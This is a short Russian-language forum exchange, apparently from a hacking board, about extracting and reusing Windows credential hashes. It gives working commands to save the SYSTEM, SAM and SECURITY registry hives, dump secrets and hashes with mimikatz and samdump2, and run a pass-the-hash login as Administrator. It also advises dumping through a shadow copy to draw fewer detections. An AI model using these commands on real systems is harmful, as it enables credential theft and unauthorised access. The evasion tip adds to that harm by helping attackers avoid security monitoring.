Всем привет, такой вопрос, что можно сделать, если есть хеш lsa и sam. Пробовал через мимишку их заюзать, и всегда пишет неправльный логин или пароль. А расшифровать их не получается
reg save HKLM\SYSTEM system & reg save HKLM\security security
lsadump::secrets /system:c:\temp\system /security:c:\temp\security
Тут я так понимаю выдаст NTLM?Для lsa нужно сдамить след образом:
reg save hklm\system system
reg save hklm\sam sam
LSA
mimikatz\> privilege::debug
mimikatz\> lsadump::secrets /system:C:\SYSTEM /security:C:\SECURITY
SAM
kali$: samdump2 system sam
или
mimikatz\> lsadump::sam /system:C:\SYSTEM /sam:C:\SAM
sekurlsa::pth /user:Administrator /domain:dom.loc /rc4:NTLM_hash
Подмечу что можно снимать сэм и т.д. через теневую копию, что меньше детектов.А вот провести path-the-hash атаку можно только с нтлм хешем(лм:нт)
SAM файл содержит LM и NT(NTLM2) хеши
SECURITY файл содержит чистые пароли, НТ и ЛМ хеши, DES и AES керб ключи, и чаще всего там находится мскеш хеши (Domain Cached Credentials (DCC1 (MS Cache) and DCC2 (MS Cache 2)))
SYSTEM содержит инфу для декрипта SAM и SECURITY